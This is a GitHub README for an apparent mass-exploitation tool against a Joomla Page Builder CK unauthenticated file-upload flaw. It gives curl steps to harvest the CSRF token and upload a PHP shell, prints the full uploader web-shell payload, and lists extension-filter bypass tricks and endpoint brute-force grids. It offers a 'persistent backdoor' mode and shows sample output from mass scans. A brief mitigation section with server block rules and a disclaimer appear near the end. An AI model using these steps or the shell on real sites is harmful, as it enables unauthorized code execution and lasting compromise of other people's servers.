Skip to content

shinthink/pbck-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

1 Commit
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

PBCK-Exploit โ€” CVE-2026-56290 Joomla Page Builder CK Exploit

Python CVE License

Discovery CSRF RCE Cleanup Live

Mass Exploitation & Validation Framework for Joomla Page Builder CK

Unauthenticated Arbitrary File Upload โ†’ Remote Code Execution



๐Ÿ“‘ Table of Contents


๐Ÿ”ด Vulnerability Overview

CVE-2026-56290 is a critical-severity vulnerability in Page Builder CK (com_pagebuilderck), a popular Joomla page builder extension. The browse.ajaxAddPicture controller method accepts unauthenticated file uploads with a user-controlled destination path, allowing attackers to write arbitrary PHP files to web-accessible directories.

The Root Cause

// browse.php controller โ€” NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // โ† user-controlled file
    $path  = trim($input->get('path', ''));       // โ† user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

The path parameter undergoes only trim() sanitization โ€” no whitelist, no directory traversal check, no authentication gate. Combined with a CSRF token that is publicly accessible from any Joomla page, attackers can remotely upload PHP shells to any writable directory.

Impact

Vector Severity Impact
Unauthenticated File Upload 9.8 (Critical) Arbitrary PHP code execution
CSRF Token Harvesting 5.3 (Medium) Enables the upload chain
Information Disclosure 5.3 (Medium) Extension version fingerprinting

The Attack Chain

1. HIT Joomla homepage     โ†’  harvest CSRF token (hex32 + value "1")
2. POST file upload         โ†’  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       โ†’  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            โ†’  code executes, RCE confirmed
5. POST f=@file to shell    โ†’  upload additional tools
6. GET ?cleanup=1           โ†’  shell self-destructs

๐ŸŸ  Affected Versions

Page Builder CK Version Status Notes
3.1.1 and below ๐Ÿ”ด Vulnerable Confirmed unauthenticated upload
3.4.10 and below ๐Ÿ”ด Vulnerable Extended range per analysis
3.5.10 and below ๐Ÿ”ด Vulnerable Some patched variants may exist
> 3.5.10 ๐ŸŸข Possibly Patched Verify via manifest XML

Note: Version is detected from the Joomla manifest file at /administrator/manifests/files/com_pagebuilderck.xml. If the manifest is inaccessible, the scanner defaults to treating the target as potentially vulnerable.


โœจ Features

๐Ÿ” Reconnaissance

  • Joomla detection โ€” 2-phase: HTML fingerprints + admin panel probe
  • PBCK detection โ€” Direct path probes + HTML pattern matching
  • Version extraction โ€” Manifest XML parsing + HTML regex fallback
  • CSRF token harvesting โ€” Multi-page token extraction (home, login, registration, admin)
  • Endpoint brute-forcing โ€” 1000+ task/param/path combos with time-budgeted discovery

๐Ÿ’€ Exploitation

  • 40+ extension bypass โ€” Case juggling, numbered variants, double extensions, Windows tricks
  • 20+ destination paths โ€” Extension dirs, Joomla writable dirs, traversal paths
  • Shell validation โ€” Token-based confirmation that PHP executes
  • Auto-cleanup โ€” Shells self-destruct after validation (?cleanup=1)
  • Live TXT output โ€” Real-time thread-safe results written to file
  • JSON report โ€” Structured report with full per-target details

๐Ÿ“ฆ Installation

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

Requirements

requests>=2.28.0
urllib3>=1.26.0

๐Ÿ“– Usage

Command Line Arguments

CVE-2026-56290 โ€” PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

Basic Usage

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

Target File Format

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

๐Ÿงช Proof of Concept

Scenario 1: Mass Scan with Live Output

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

  โœ… https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  ๐Ÿ›ก๏ธ https://target-patched.com  [patched]  3.2s

  โœ… https://target-vuln2.com  [rce_confirmed]  15.1s
     PBCK: 3.1.0 [VULN]
     RCE  : ext=pHP | path=media/com_pagebuilderck/fonts/
     Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

==================================================
  SCAN SUMMARY
==================================================
  Total           : 5
  โœ… RCE Confirmed : 2
  โš ๏ธ  RCE Failed    : 1
  ๐Ÿ›ก๏ธ  Patched       : 1
  ๐Ÿ” Need Diff     : 0
  โŒ Not Joomla    : 0
  โญ๏ธ  No Component  : 1
  ๐Ÿ’ฅ Errors         : 0
==================================================

Scenario 2: Manual Reproduction (curl + Python)

Step 1 โ€” Harvest CSRF Token

curl -sk 'https://target.com/' | grep -oP 'name="[a-f0-9]{32}" value="1"'
# name="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6" value="1"

Step 2 โ€” Upload PHP Shell

TOKEN="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"

curl -sk \
  -F "file=@shell.php;type=application/x-php" \
  -F "path=media/com_pagebuilderck/gfonts/" \
  "https://target.com/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&${TOKEN}=1"

Step 3 โ€” Verify RCE

curl -sk 'https://target.com/media/com_pagebuilderck/gfonts/shell.php'
# โ†’ PHP shell output, confirms code execution

Scenario 3: The PHP Shell Payload

The scanner deploys a self-contained uploader shell โ€” no exec(), system(), or eval() required:

<html><body>
<form method=post enctype=multipart/form-data>
  <input type=file name=f>
  <input type=submit value=Upload>
</form>
<pre><?php
if(isset($_FILES['f'])){
  move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
  echo $_FILES['f']['name'].' OK';
}
if(isset($_GET['cleanup'])){
  @unlink(__FILE__);
  die('CLEANED');
}
echo '<unique-validation-token>';
?></pre></body></html>

Shell capabilities:

  • ๐Ÿ“ค Upload additional files via POST f=@file
  • ๐Ÿงน Self-destruct via ?cleanup=1
  • ๐Ÿ”‘ Token-based validation (scanner verifies the unique token in output)

๐Ÿ”ฌ Technical Deep-Dive

Architecture

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                     PBCK-EXPLOIT                        โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚   RECON PHASE   โ”‚           EXPLOIT PHASE               โ”‚
โ”‚                  โ”‚                                      โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ Joomla     โ”‚  โ”‚  โ”‚ Endpoint     โ”‚  โ”‚ Extension    โ”‚  โ”‚
โ”‚  โ”‚ Detection  โ”‚  โ”‚  โ”‚ Brute-force  โ”‚  โ”‚ Bypass Grid  โ”‚  โ”‚
โ”‚  โ”‚ (2-phase)  โ”‚  โ”‚  โ”‚ (1000+ combo)โ”‚  โ”‚ (40+ exts)   โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ”‚        โ”‚         โ”‚         โ”‚                  โ”‚          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ PBCK       โ”‚  โ”‚  โ”‚ CSRF Token   โ”‚  โ”‚ PHP Shell    โ”‚  โ”‚
โ”‚  โ”‚ Detection  โ”‚  โ”‚  โ”‚ Harvester    โ”‚  โ”‚ Deployment   โ”‚  โ”‚
โ”‚  โ”‚ (probes)   โ”‚  โ”‚  โ”‚ (5 pages)    โ”‚  โ”‚ (20+ paths)  โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ”‚        โ”‚         โ”‚         โ”‚                  โ”‚          โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚         โ”‚           โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ–ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ”‚
โ”‚  โ”‚ Version    โ”‚  โ”‚         โ”‚           โ”‚ Validation   โ”‚  โ”‚
โ”‚  โ”‚ Check      โ”‚  โ”‚         โ”‚           โ”‚ + Cleanup    โ”‚  โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚         โ”‚           โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Endpoint Discovery Strategy

The scanner uses a tiered brute-force approach with a per-target time budget (15s):

Tier Tasks File Params Folder Params Dest Paths Total Combos
Tier 1 (confirmed) browse.ajaxAddPicture + 3 others file, Filedata path, folder, dir Top 4 PBCK dirs 96
Tier 2 (full grid) 12 tasks 4 params 5 params 20+ paths 4,800+

Each combo: upload a .txt probe โ†’ verify via GET โ†’ match on success. Returns immediately when confirmed.

Extension Bypass Philosophy

CKFile::makeSafe() blocks .php on some configurations. The bypass strategy:

Tier 1: Fast
  php, PHP, pht, phar
         โ†“ (if blocked)
Tier 2: Case juggling
  Php, pHp, PhP, pHt, PHT, PhTmL, pHtml, ...
         โ†“ (if blocked)
Tier 3: Alternative handlers
  php3, php4, php5, php6, php7, php8, phtml, shtml, inc
         โ†“ (if blocked)
Tier 4: Double extensions
  php.jpg, jpg.php, php.png, php.gif, php.txt
         โ†“ (if blocked)
Tier 5: Windows tricks
  php., PHP., php. , php.SWF

CSRF Token Harvesting

Joomla's CSRF token is embedded in every page โ€” home, login, registration, contact forms, admin:

CSRF_PAGES = [
    "",                                                            # homepage
    "/index.php?option=com_users&view=login",                       # login
    "/index.php?option=com_users&view=registration",                # registration
    "/index.php?option=com_contact&view=contact&id=1",              # contact
    "/administrator/index.php",                                     # admin login
]

Pattern A โ€” HTML hidden input: <input type="hidden" name="<hex32>" value="1">

Pattern B โ€” JSON config: "csrf.token":"<hex32>"


๐Ÿ” Detection Methodology

Joomla Detection (2-Phase)

Phase 1 โ€” HTML Fingerprints (fast, definitive)

  • Generator meta tag containing "Joomla!"
  • Structural elements: <jdoc:include>, joomla-script-options, "csrf.token"
  • Path patterns: /components/com_, /modules/mod_, /plugins/system/
  • Session cookie analysis

Phase 2 โ€” Admin Panel Probe (fallback)

  • Fetches /administrator/ page
  • Checks for Joomla-specific admin markers: name="username", mod-login-, administrator/templates/

PBCK Detection (3-Tier)

Tier 1 โ€” HTML strong indicators

com_pagebuilderck, /pagebuilderck/, /media/com_pagebuilderck

Tier 2 โ€” HTML weak indicators with confirmation

pagebuilderck + (pbck_ | pagebuilderck.css | pagebuilderck.js)

Tier 3 โ€” Direct file probes (catches installs where PBCK isn't on homepage)

/media/com_pagebuilderck/css/pagebuilderck.css
/media/com_pagebuilderck/js/pagebuilderck.js
/administrator/manifests/files/com_pagebuilderck.xml

๐Ÿ›ก๏ธ Defense & Mitigation

1. Upgrade Immediately

# Update Page Builder CK to the latest patched version
# Check: https://extensions.joomla.org/extension/page-builder-ck/

2. Block the Upload Endpoint

# Nginx โ€” block unauthenticated access to the upload controller
location ~* "option=com_pagebuilderck&task=browse.ajaxAddPicture" {
    deny all;
}
# Apache/.htaccess
RewriteCond %{QUERY_STRING} task=browse\.ajaxAddPicture [NC]
RewriteRule ^ - [F]

3. Harden PHP Execution in Writable Directories

# .htaccess in media/ โ€” disable PHP execution
<FilesMatch "\.php$">
    Require all denied
</FilesMatch>

4. Audit Your Fleet

# Scan your own infrastructure
python cve_2026_56290.py -f my_joomla_sites.txt -o audit_results.txt

โš ๏ธ Disclaimer

๐Ÿšจ FOR EDUCATIONAL & AUTHORIZED TESTING PURPOSES ONLY

This software is provided solely for educational purposes and legitimate security research. It is intended to be used by:

  • ๐Ÿ›ก๏ธ Security professionals conducting authorized penetration tests
  • ๐Ÿข Organizations auditing their own Joomla infrastructure
  • ๐Ÿ”ฌ Researchers studying vulnerability exploitation techniques
  • ๐ŸŽ“ Students learning about web application security

โŒ You may NOT use this software to:

  • Access computer systems without explicit written authorization
  • Compromise, damage, or disrupt systems you do not own
  • Engage in illegal activity of any kind

โš–๏ธ Legal Notice

Unauthorized access to computer systems violates laws including but not limited to:

  • United States: Computer Fraud and Abuse Act (18 U.S.C. ยง 1030)
  • Indonesia: UU ITE Pasal 30 & 46 (UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
  • European Union: Directive 2013/40/EU
  • United Kingdom: Computer Misuse Act 1990

The author(s) assume NO LIABILITY for any misuse, damage, or legal consequences resulting from the use of this tool. By using this software, you acknowledge that you are solely responsible for your actions and agree to comply with all applicable laws.


๐Ÿ“š References

Resource Link
NVD Entry CVE-2026-56290
Joomla Security developer.joomla.org/security
Page Builder CK extensions.joomla.org
OWASP File Upload Unrestricted File Upload

โšก Built with precision for the security research community โšก

Joomlaยฎ is a registered trademark of Open Source Matters, Inc.
This project is not affiliated with or endorsed by Joomla, Open Source Matters, or Page Builder CK.

About

๐Ÿ“ค Mass exploitation framework for CVE-2026-56290 โ€” Page Builder CK Joomla unauthenticated file upload to RCE

Topics

Resources

Stars

2 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages